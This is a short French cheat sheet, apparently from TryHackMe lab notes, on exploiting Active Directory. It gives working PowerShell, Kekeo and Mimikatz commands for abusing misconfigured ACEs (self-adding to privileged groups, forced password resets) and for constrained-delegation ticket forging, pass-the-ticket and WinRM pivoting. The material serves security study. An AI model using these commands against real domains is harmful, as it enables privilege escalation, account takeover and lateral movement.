[AD] Cheat-sheet
Introduction
Quelques techniques d'exploitation de vulnérabilité sur l'Active Directory.
Techniques
Mauvaise configuration ACE
Les ACE pour Access Control Entries sont des propriétés propres aux objets du domaines.
Si elles sont mal configurées, elles peuvent aboutir à une exploitation.
Par exemple, si on possède l'ACE AddMember on peut ajouter un utilisateur dans un groupe (y compris soit-même).
On peut donc se mettre dans un groupe à privilège élevé :
Add-ADGroupMember "IT Support" -Members "<USERNAME>"
Un autre ACE exploitable est ForceChangePassword qui permet de changer le mot de passe d'un utilisateur sans connaître son mot de passe :
$Password = ConvertTo-SecureString "<NEW_PASSWD>" -AsPlainText -Force
Set-ADAccountPassword -Identity "<USERNAME>" -Reset -NewPassword $Password
Constrained Delegation
Les délégations contraintes permettent à des services d'utiliser les droits d'autres d'objet du domaine pour accéder à un service.
Avec PowerSploit, il est possible d'énumérer les délégations :
Import-Module C:\Tools\PowerView.ps1
Get-NetUser -TrustedToAuth
Avec l'outil Kekeo, on peut demander de générer un ticket TGT avec notre compte de service compromis :
kekeo# tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:redacted
Ensuite avec ce TGT, on peut demander au serveur de générer des TGS :
kekeo# tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc
Une fois les TGS générés, on peut utiliser Mimikatz pour faire du Pass-The-Ticket :
mimikatz # privilege::debug
mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
Une fois les tickets injectés, on peut utiliser nos nouveaux droits pour créer une session WinRM et pivoter vers une autre machine :
New-PSSession -ComputerName thmserver1.za.tryhackme.loc
Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc